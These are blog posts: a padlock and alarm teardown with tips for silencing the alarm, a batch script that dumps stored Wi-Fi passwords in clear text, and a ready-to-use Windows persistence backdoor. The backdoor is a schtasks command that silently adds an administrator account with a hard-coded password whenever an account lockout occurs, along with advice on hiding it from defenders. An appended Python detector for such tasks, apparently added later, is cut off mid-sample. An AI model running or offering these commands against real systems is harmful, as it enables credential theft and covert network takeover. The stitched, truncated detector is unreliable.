<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCyvGRhOg5AsrshA9Xz4p84agiRx0VaC-SqGi7wOXy1zF53i6BZ8OxMfjpRT0CncWBAPtueSDpe-V2KBJ3Uh1LnlsC7XJZ_2awgytM7THVrjT8JTAHPoGPz0XVwnYtX_xJg-mDSlus6EQ/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="229" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCyvGRhOg5AsrshA9Xz4p84agiRx0VaC-SqGi7wOXy1zF53i6BZ8OxMfjpRT0CncWBAPtueSDpe-V2KBJ3Uh1LnlsC7XJZ_2awgytM7THVrjT8JTAHPoGPz0XVwnYtX_xJg-mDSlus6EQ/s320/2.png" width="320" /></a></div>
With just a small Phillips screwdriver you can undo the bottom plate and access the internals. However, actually getting that bottom plate off is rather tricky since it's a very, very tight fit.<br />
<br />
Internals exposed<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX579wMbyCcQ46p7c_jPWlOhCBig6Sov_4126a3Tky0BcdWVMwTALZOZjZAuFUW4C7JITaidaEhj4UZQxMWJv1KuwktTzHS2ue8d_b0LHx3zJZMaqfJGdQrp-3dVhuO6b73TTiALngL24/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX579wMbyCcQ46p7c_jPWlOhCBig6Sov_4126a3Tky0BcdWVMwTALZOZjZAuFUW4C7JITaidaEhj4UZQxMWJv1KuwktTzHS2ue8d_b0LHx3zJZMaqfJGdQrp-3dVhuO6b73TTiALngL24/s320/3.png" width="320" /></a></div>
On the top here you can see the edge of the circuit board, the wiring, and the battery compartment cover (white plastic).<br />
<br />
Here's the circuitry:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp_0HgknM8yKVjA6mzWe-HY9wjfBo3wDvBKqgqcPxHUyvrKOZFEc6blrPwIHSOw47E3vqnPuaAJmyryOkRtKi9yXNw0WrJUubkYcscYp9EzZQ1bH8sbvQZULVAo9hwKrzifYH2hBRUKBQ/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp_0HgknM8yKVjA6mzWe-HY9wjfBo3wDvBKqgqcPxHUyvrKOZFEc6blrPwIHSOw47E3vqnPuaAJmyryOkRtKi9yXNw0WrJUubkYcscYp9EzZQ1bH8sbvQZULVAo9hwKrzifYH2hBRUKBQ/s320/4.png" width="320" /></a></div>
<br />
Large black circle in the upper left is the speaker. Yellow is a piece of rubber meant to waterproof.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6Vr1i82EfcoKN8ztN1piaapFvX73yCRkhyF9kGGnfc4KuOwaVk7HlX04Gk-0UCRa6Ra9A4FJqnO2TO5-As5rkTHbbzYrQ03eQWlYPu0QbHLyhMyLJY5ELIaBHxeyHPJ9iQE2CWFXooc8/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6Vr1i82EfcoKN8ztN1piaapFvX73yCRkhyF9kGGnfc4KuOwaVk7HlX04Gk-0UCRa6Ra9A4FJqnO2TO5-As5rkTHbbzYrQ03eQWlYPu0QbHLyhMyLJY5ELIaBHxeyHPJ9iQE2CWFXooc8/s320/5.png" width="320" /></a></div>
<br />
Above: A closeup of the circuit board "front" <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTO4bUVFyxmdQPg31pd_hyphenhyphennugu3lwsY3Bn1a052DPkRNOi-2BfXx4nMB3bjLxvtYhkrKYnloxvo3AieZobSHXgQVhFz6t6SipOzsGG1h8SYzrMsmn_mrUT7ED7WU9tfe7tHUQHnKvZZk4/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTO4bUVFyxmdQPg31pd_hyphenhyphennugu3lwsY3Bn1a052DPkRNOi-2BfXx4nMB3bjLxvtYhkrKYnloxvo3AieZobSHXgQVhFz6t6SipOzsGG1h8SYzrMsmn_mrUT7ED7WU9tfe7tHUQHnKvZZk4/s320/6.png" width="320" /></a></div>
Above: A closeup of the "back" of the circuit board. The white wrapped part is a trembler switch that activates the alarm if the lock is moved too much. It is a metal tube hooked to ground with a delicate spring inside hooked to positive. The spring will jiggle, come into contact with the tube, and complete the circuit, activating the alarm.<br />
<br />
Not pictured: There is a magnetic reed switch on the positive cable that extends upwards into the lock. There is also a magnet on the extension from the back of the lock cylinder so that when the lock is turned to the alarm (little speaker picture) setting it closes the circuit and then allows the trembler to set off the alarm if activated.<br />
<br />
So that's that for the alarm part of the lock. You can muffle it with silly putty stuffed into the speaker holes, or you can unscrew the bottom, remove the plate, then take your choice of methods to disable the circuitry.<br />
<br />
<br />
Let's take a look at the Z-Con lock core.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyxgzEapwSWi-mSA5QPQM9gy6QRnDMb5qvtwcuL8Loux3ox0iPAiZdamA2YC0faTihgdZbR2uDfG_a2zPMzcFqa531HI-UnPF8iU0aW3sVPp2VSOsGlnA1Wm8289esjtx5oEJ36HTVckQ/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyxgzEapwSWi-mSA5QPQM9gy6QRnDMb5qvtwcuL8Loux3ox0iPAiZdamA2YC0faTihgdZbR2uDfG_a2zPMzcFqa531HI-UnPF8iU0aW3sVPp2VSOsGlnA1Wm8289esjtx5oEJ36HTVckQ/s320/7.png" width="320" /></a></div>
Here it is still in the lock body. There is a bit of a funnel piece, for which you have to drill out the retaining plug just to the right of the lock core. It is also held in place by a lock ring. I could not find a way to remove the funnel without permanently damaging the lock body. I kind of get the feeling they really don't want you to take it apart.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-f4TJC03UPgziKG4NDaggEmyOaFZ6jGsr9MBgVOTbz6O63l3Tr6lP7yq8hfTHYAkb3lfvl_9QCSplNQGV1J5KfLz3SxKxpPqwkx3nQc8QXTlNbACCYQ-B3vocDfI3sl4DDCg3k0XsPdc/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-f4TJC03UPgziKG4NDaggEmyOaFZ6jGsr9MBgVOTbz6O63l3Tr6lP7yq8hfTHYAkb3lfvl_9QCSplNQGV1J5KfLz3SxKxpPqwkx3nQc8QXTlNbACCYQ-B3vocDfI3sl4DDCg3k0XsPdc/s320/8.png" width="246" /></a></div>
<br />
<br />
<br />
<br />
So here's the actual lock core. I've drawn 3 lines to show the way the key lines up inside the lock.<br />
Green: the lock is open; the key is not removable in this position.<br />
Yellow: the lock is in the normal locked position. Notice the extra cut out extensions; these allow the key to be inserted and extracted.<br />
Red: the lock is in the locked and alarmed position. Again, notice the extra cut out extensions allowing the key to be inserted and removed from this position.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0d-2IvlVQQJKhV-69U9IKslwoFD34i7PL33jvTQDfhd0FCfh5N76wIZFKu4gh6j7LKloOh9W_6ZBWLLQ-g0P6C1xbEgTvMQ390juxBEksQMVcrRxVSaqMUGqIdws8dbNzfThd4Vlq6Oo/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0d-2IvlVQQJKhV-69U9IKslwoFD34i7PL33jvTQDfhd0FCfh5N76wIZFKu4gh6j7LKloOh9W_6ZBWLLQ-g0P6C1xbEgTvMQ390juxBEksQMVcrRxVSaqMUGqIdws8dbNzfThd4Vlq6Oo/s320/12.png" width="261" /></a></div>
Here is the back of the lock core. The red arrows point to the lock ring that keeps the inner core and the outer shell together.<br />
<br />
<br />
The inner core is made of 2 parts (minus the springs and wards)<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxMqWMJLH8_scMBLXBfG0LQiBPkoAIGvztlCdRHAA54wtEPwurWmPAUsjhPr0NPqOU8jv3P9w-Z3CbOLA8eDoMPeEAbxZWbwkPiPCacjDCQNbzHlU8VeDOpgN-x125__G50QGfbeL3op0/s1600/12-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxMqWMJLH8_scMBLXBfG0LQiBPkoAIGvztlCdRHAA54wtEPwurWmPAUsjhPr0NPqOU8jv3P9w-Z3CbOLA8eDoMPeEAbxZWbwkPiPCacjDCQNbzHlU8VeDOpgN-x125__G50QGfbeL3op0/s1600/12-1.png" /></a></div>
<br />
Here is the point of interaction between the top of the inner core and the key.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd8P3bOGCVVbrtaPFyC2HKdwG3JR7oi3QJCzu-bCTbN5mhYOHR8dshE5_Ko4dWwrZHlZsk_Ri5n2FJrt1KTv8d8bN32UZeuIDbnDcYbYO46sOHzy4kUnEVFZWNL1EN3RdCDreh5HCKTPE/s1600/14.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd8P3bOGCVVbrtaPFyC2HKdwG3JR7oi3QJCzu-bCTbN5mhYOHR8dshE5_Ko4dWwrZHlZsk_Ri5n2FJrt1KTv8d8bN32UZeuIDbnDcYbYO46sOHzy4kUnEVFZWNL1EN3RdCDreh5HCKTPE/s320/14.png" width="211" /></a></div>
<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmwr2wW5ykmLvMW-M4w2mnT8WUOgrQkFeknXAZlr5KKtAynAqMsG0hCPmx-A5biLNe65Ld67dpztTNrhi7LUn-rz6mUCmEWeVgx9jEQtzvTgBIHQ1rG1yoG2t3eS6uGjICaWtjFIDsj0s/s1600/13.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmwr2wW5ykmLvMW-M4w2mnT8WUOgrQkFeknXAZlr5KKtAynAqMsG0hCPmx-A5biLNe65Ld67dpztTNrhi7LUn-rz6mUCmEWeVgx9jEQtzvTgBIHQ1rG1yoG2t3eS6uGjICaWtjFIDsj0s/s1600/13.png" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Here is the bottom of the inner core. You can see the springs and the 3 moving wards at the bottom.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEFKBLJ_VYo6a5tciiG_krEezVIxOT4KlfNHJfZGztf_92beTQNbhyphenhypheneONPUNwxMhcIrTmiMz4KrOMZkLSmhAM_I5kDalLhmNUhk-hVHBQLtD5ShF_KGtt1lK2Ayw6uXzgR4QsEyLE_HMw/s1600/9.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEFKBLJ_VYo6a5tciiG_krEezVIxOT4KlfNHJfZGztf_92beTQNbhyphenhypheneONPUNwxMhcIrTmiMz4KrOMZkLSmhAM_I5kDalLhmNUhk-hVHBQLtD5ShF_KGtt1lK2Ayw6uXzgR4QsEyLE_HMw/s320/9.png" width="130" /></a></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjagcsIhHyC7w0mm2L-COJ5zHTM3_6t_zy9pr6G24imvPaS-UvoatKyIDujbGOw2fbklciGr0X-xjp-JhrM4P2Y2WqRTpsl4RqKkmLJpDP6tlMgnkzEIBh5Eu5zf64r7kv4jsN9ZvxGMPM/s1600/11.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjagcsIhHyC7w0mm2L-COJ5zHTM3_6t_zy9pr6G24imvPaS-UvoatKyIDujbGOw2fbklciGr0X-xjp-JhrM4P2Y2WqRTpsl4RqKkmLJpDP6tlMgnkzEIBh5Eu5zf64r7kv4jsN9ZvxGMPM/s320/11.png" width="288" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Above left is the lock inner core with the key inserted. Note the 3 black extensions; these are the moving wards.<br />
Above right is the lock outer cover. The red arrows show the grooves that allow the lock to turn when the wards align properly. The green arrow shows the groove for the lock ring that holds the two parts of the lock together.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt6YeluVYbVUE77qk-oo6DipqxlQPyj6U0eCGlQTspixDfcVGWTXdIkHPpoBTFuuRp6WzTYayJNtEJ-pLJtYzH2TZvz7JAYbTti6aZwAIiA7D7_zApczx9XiAmv9n5-Be0ZF1gmP8a8k4/s1600/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt6YeluVYbVUE77qk-oo6DipqxlQPyj6U0eCGlQTspixDfcVGWTXdIkHPpoBTFuuRp6WzTYayJNtEJ-pLJtYzH2TZvz7JAYbTti6aZwAIiA7D7_zApczx9XiAmv9n5-Be0ZF1gmP8a8k4/s320/16.png" width="320" /></a></div>
Here is the inner core fully disassembled:<br />
Top left: core shell<br />
Top middle: inner core lower<br />
Top right: inner core upper<br />
<br />
The 3 black plastic items in the lower right are the moving wards. Note
the difference in the diameter of the hole in the middle of them. These
correspond to the different diameters of the key, which then align them
with the grooves in the core shell and allow the inner core to move thus
turning the extension on the top of the lock core (not pictured) that
allows the ball bearings to retract and the shackle to open. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR0bzdtm9qLrJOHyxlRI4WqlkiuG9Zcn1Wml4SKXgqDMkoJxfjZxOTwjl7aLchcGCj2-7o_cggixFF71AsbylmG9G35fv_21Wb4tX_OA5Co6LDH8_x8uPMaP4jR18pHdXxO-cP8nWYwVY/s1600/15.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR0bzdtm9qLrJOHyxlRI4WqlkiuG9Zcn1Wml4SKXgqDMkoJxfjZxOTwjl7aLchcGCj2-7o_cggixFF71AsbylmG9G35fv_21Wb4tX_OA5Co6LDH8_x8uPMaP4jR18pHdXxO-cP8nWYwVY/s1600/15.jpg" /></a></div>
Inner core with all springs, wards, and upper portion removed.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgegUhrgStyh22U7YjnymyFOQcYOwG2hzqGJIEm0E0rTGXl1pz6MKtJy4EVXxk7EBdW-U8n7cubUOjd4XB-hKX4Mje06Em08xWD_UFsQB2WkK9MBmB4kiYoJxhawoQkkUdgNh5F_5sa86M/s1600/9-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgegUhrgStyh22U7YjnymyFOQcYOwG2hzqGJIEm0E0rTGXl1pz6MKtJy4EVXxk7EBdW-U8n7cubUOjd4XB-hKX4Mje06Em08xWD_UFsQB2WkK9MBmB4kiYoJxhawoQkkUdgNh5F_5sa86M/s320/9-2.png" width="169" /></a></div>
This is a Z-Con key (not mine). The blue arrow is pointing to the ward that keeps the key in the lock when in the open position and also turns the lower portion of the inner core of the lock.<br />
The red arrows point to the resting locations for the black plastic moving wards. See that the diameter of the holes in the plastic rings corresponds with the diameter and steps of the key.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9JdHUeUsG6CLC50pXjNWVujJXJ3e7yKE-T_QpLwt5jvdVLV_e3KMEgv4USrc5DaU6Bmrbr2m3yYnuf6ptJDVf12u_pWb7CkR2KX3r5YrcAscs56MAHx48-EGjZ3hO23Y8mGqQ58hEJKg/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9JdHUeUsG6CLC50pXjNWVujJXJ3e7yKE-T_QpLwt5jvdVLV_e3KMEgv4USrc5DaU6Bmrbr2m3yYnuf6ptJDVf12u_pWb7CkR2KX3r5YrcAscs56MAHx48-EGjZ3hO23Y8mGqQ58hEJKg/s320/10.png" width="114" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEFKBLJ_VYo6a5tciiG_krEezVIxOT4KlfNHJfZGztf_92beTQNbhyphenhypheneONPUNwxMhcIrTmiMz4KrOMZkLSmhAM_I5kDalLhmNUhk-hVHBQLtD5ShF_KGtt1lK2Ayw6uXzgR4QsEyLE_HMw/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEFKBLJ_VYo6a5tciiG_krEezVIxOT4KlfNHJfZGztf_92beTQNbhyphenhypheneONPUNwxMhcIrTmiMz4KrOMZkLSmhAM_I5kDalLhmNUhk-hVHBQLtD5ShF_KGtt1lK2Ayw6uXzgR4QsEyLE_HMw/s320/9.png" width="130" /></a></div>
<br />
So that's how they work.<br />
<br />
Now for how to pick them...<br />
<br />
I've got some ideas but nothing I've really tested yet. As far as a straight up bypass I don't see anything that would work.<br />
<br />
The keys almost have to have a very low entropy as far as possible bitting setups. A unique lock would require not only a unique key to be lathed but also a unique core shell with matching inner grooves.<br />
My assumption would be that only 1 of the wards (the lowest) is actually movable as far as the bitting is concerned; the other 2 are static for all keys. I think this because the lowest ward is the only one that doesn't sit on a lathed ledge; it sits on a couple of ears that stick out. But I don't have access to any other Z-Con locks and keys so I can't really say for sure.<br />
<br />
I'll be posting the exact measurements of the key in a few days so others can compare and we can find out just exactly how many unique keys there are for this type of lock and possibly make a pick for it.<br />
<br />
Dumping Wireless Passwords from Windows Machines (win7 & win8 tested; win10 not tested) using netsh<br />
Published 2015-08-17T09:09:00.001-10:00, updated 2015-08-17T11:31:37.579-10:00<br />
<br />
Here's how to dump all the wifi passwords from a Windows machine using built-in tools:<br />
Windows 7 - Tested Successfully<br />
Windows 8 - Tested Successfully<br />
Windows 10 - Not Tested<br />
<br />
-=batch file=-<br />
@echo off<br />
for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (<br />
netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number"<br />
echo.<br />
)<br />
pause > nul<br />
<br />
<br />
How it works:<br />
When doing a netsh wlan show profiles we get all the wireless profiles for the machine, but we also get a lot of other garbage that gets in the way. Piping it to find "Profile " cleans that up to only what we want. Notice the space after Profile in the find command. Then we can delimit on : and space character to get it down to just the wireless ssid's.<br />
<br />
Now that we have just the ssid's, aka Profiles in netsh terms, we can query them to get various information from them, mostly we're just concerned with SSID, Cipher (encryption) and Key Content (the password). Using findstr we can search for multiple terms in one go, however the term Number of SSID's is also in the information so we use a find /v (do not match) to strip that out. Echo. inserts a blank line to keep things readable.<br />
<br />
You'll likely want to add a redirect to save the output to a text file, a remote server share, or something else you can hold onto.<br />
<br />
-=The one liner =-<br />
I also wrote up a one liner to use in the event you can't run a batch file:<br />
<br />
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on<br />
<br />
This one-liner produces nice clean output by first clearing the screen (cls), echoing a blank line (echo.), then running through the same script with the echo feature off, and conveniently turning it back on at the end.<br />
<br />
<br />
Windows Event Log Driven Back Doors<br />
Published 2015-03-11T11:53:00.000-10:00, updated 2015-03-11T11:53:32.220-10:00<br />
<br />
Well it's about time to get that white hat a little dirty.<br />
<br />
None of these are original ideas; I've heard of this being done in theory, as in "oh, you know what would make a good persistence idea?", but I've never actually seen anything implement it. So I decided to do that.<br />
*EDIT In fact this is exactly where I saw it first. <a href="https://isc.sans.edu/diary/Wipe+the+drive!++Stealthy+Malware+Persistence+-+Part+4/15460" target="_blank">SANS Wipe the HardDrive</a> written by Mark Baggett and inspired by Jake Williams.<br />
<br />
Let us take this from the metaphysical to the physical. <br />
<br />
I was red teaming a bit for an experiential learning class. I needed to create a backup method of maintaining access to a domain. I didn't want anything running constantly, I didn't want to leave files on the disk. <br />
<br />
I have been utilizing Event ID driven scheduled tasks at work for some monitoring and logging of service creation, user creation/deletion, users being added to security groups, little things that are really helpful to have an eye on and will give you a huge leg up in the event of malware infections and penetration incidents and just in general to have a better idea of what's going on in your domain. This is especially effective if you setup an event log gatherer and use subscriptions pushed out to all computers on the domain. Anyways, I decided to write a scheduled task that will trigger in the event of an account being locked out. This is something I can trigger externally from an OWA page, PPTP portal, corporate web page, anything that has a windows based login method that checks against AD. <br />
<br />
So here's our command:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k net user Backdoor 1R3AlG00dP@55w0rd /add /y /active:yes >> nul & net localgroup administrators Backdoor /add > nul & net user Backdoor /comment:\"Built-in account for Backdooring your network suckers\" > nul & exit" /f /ru system /ec Security /sc onevent /mo "*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4740]]"</span><br />
<br />
Let's step through the command:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">schtasks /create</span> - Create a new scheduled task<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">/tn "Microsoft\Windows\LocalEventLogRotate"</span> - <span style="font-family: Times,"Times New Roman",serif;">The name of the task will be LocalEventLogRotate, and here is something I found interesting when I first came across it. In the modern Task Scheduler there are several subfolders that have tasks in them. It's not very likely that someone is going to drill down into them to check for tasks. You can make the path whatever you want *needs citation and Task Scheduler will make the directory structure. Nifty, right? So this task will show up in the Microsoft\Windows subfolder. No point in making it really easy to find, right?</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">/tr "\"cmd.exe\" /k net user Backdoor 1R3AlG00dP@55w0rd /add /y /active:yes > nul & net localgroup administrators Backdoor /add > nul & net user Backdoor /comment:\"Built-in account for Backdooring your network suckers\" > nul & exit"</span> - <span style="font-family: Times,"Times New Roman",serif;">This is the meat here: the command that will execute when the event occurs. Double quotes are an issue that needs to be dealt with. We want cmd.exe to execute everything else as an argument, so we need to enclose that in quotes, but we also have to have our arguments in quotes since there are spaces. We can't just do this: "cmd.exe" "/k etc...", because then that's 2 different things and it will fail with a syntax error as an invalid argument. So we need to escape, with the \, every double quote inside the outermost double quotes. Since the goal is to not have extra files on the disk, this command needs to be a one-liner. In batch you can use the & sign to string commands together. & = run the following command no matter the success / failure of the previous command. && = run the following command ONLY if the previous command was successful. In this instance the command will create a user named Backdoor with password 1R3AlG00dP@55w0rd and make sure the account is active (/active:yes). Also note that if your password is going to be 14 characters or over, you need to add the /y switch to the net user add, otherwise it will hang forever in purgatory waiting for a response. Bad thing to have happen to your last resort backdoor. Then it adds that account to the local administrators group, then adds a comment to the user account to kind of disguise it a bit, like the other built-in accounts Windows creates. Take the extra time to make your stuff look like it belongs and it's more likely to get past the people hunting for it at first glance, which may well provide you the extra 5 minutes you need to get the job done.</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;">/f - <span style="font-family: Times,"Times New Roman",serif;">Force the task to be created even if a task with the same name already exists.</span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;">/ru system - <span style="font-family: Times,"Times New Roman",serif;">run as the SYSTEM user. This is important as if you don't have a valid account and password to use that's active you can't make the task run unless that user is logged in when it happens. Run as system = task executes every time the Event ID is triggered, not just when the user that created the task is logged in.</span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;">/sc onevent - <span style="font-family: Times,"Times New Roman",serif;">When to execute the task, in this instance we want to have it execute when a particular event happens.</span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;">/ec Security - <span style="font-family: Times,"Times New Roman",serif;">Which event log to follow to look for the Event ID in question. So if you need to follow a different Event ID and it occurs in the Application or System or whatever event log, you'll need to change that to match.</span></span></span></span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;">/mo "*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4740]]"</span> - Modifier for the <span style="font-family: "Courier New",Courier,monospace;">onevent</span> trigger. This is where we define exactly what event we're looking for. It's <i>kind of </i>intuitive when you look at it. We're looking for EventID 4740 (user account locked out) logged by the Microsoft Windows Security Auditing provider. If you can't figure out how to modify that to be exactly what you want, open the event log, find the event you want to trigger on, right click, attach task to this event. Skip through, choose execute a program, cmd.exe. Then go into Task Scheduler Library\Event Viewer Tasks, find your newly created task, right click it, export, save it, and open the XML file. Voilà, there's the exact string you need to copy, in the <Subscription> tag.</span></span><br />
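For the monitoring side of this, an added example (not part of the original post) that audits exported task XML for the pattern described above: an event trigger, a SYSTEM principal, and an action that changes local accounts. The two task definitions are constructed samples with the password replaced by a placeholder, and the function names and the benign script path are hypothetical.<br />

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_IDS = {"s-1-5-18", "system", "nt authority\\system"}

# Event IDs the post describes as triggerable from outside the host.
# 4740 (account lockout) is the one it uses; extend for your environment.
REMOTELY_FIRED = {4740: "account lockout"}

# Account-changing commands that deserve a human look when an event fires them.
RISKY_ACTIONS = [
    (re.compile(r"\bnet1?(?:\.exe)?\s+user\b.*?/add\b", re.I),
     "creates a local account"),
    (re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\b.*?/add\b", re.I),
     "adds a member to Administrators"),
]


def audit_task(xml_text):
    """Report on one exported task definition (str, or the file's raw bytes)."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)

    # Event-driven tasks carry their XPath filter inside <Subscription>.
    subs = [s.text or "" for s in
            root.findall("t:Triggers/t:EventTrigger/t:Subscription", NS)]
    event_ids = sorted({int(n) for s in subs
                        for n in re.findall(r"EventID\s*=\s*(\d+)", s)})

    users = [(u.text or "").strip().lower()
             for u in root.findall("t:Principals/t:Principal/t:UserId", NS)]
    runs_as_system = any(u in SYSTEM_IDS for u in users)

    actions = []
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS)
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        for pattern, meaning in RISKY_ACTIONS:
            if pattern.search(f"{cmd} {args}") and meaning not in actions:
                actions.append(meaning)

    notes = [f"fires on {REMOTELY_FIRED[e]} (EventID {e})"
             for e in event_ids if e in REMOTELY_FIRED]
    return {
        "uri": uri,
        "event_ids": event_ids,
        "runs_as_system": runs_as_system,
        "actions": actions,
        "trigger_notes": notes,
        # All three together is the combination worth escalating.
        "suspicious": bool(subs) and runs_as_system and bool(actions),
    }


def flagged(exports):
    """exports: mapping of file name -> XML text. Returns the suspicious URIs."""
    reports = (audit_task(x) for x in exports.values())
    return [r["uri"] for r in reports if r["suspicious"]]


# Constructed sample modelled on the task in the post (password replaced).
SUSPICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\LocalEventLogRotate</URI></RegistrationInfo>
  <Triggers><EventTrigger><Enabled>true</Enabled>
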